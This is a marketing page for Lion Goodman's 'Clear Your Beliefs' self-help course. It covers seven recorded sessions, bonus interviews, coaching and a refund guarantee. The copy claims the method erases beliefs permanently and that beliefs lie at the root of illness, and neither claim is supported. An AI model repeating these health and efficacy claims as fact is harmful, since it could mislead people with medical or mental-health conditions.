why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion 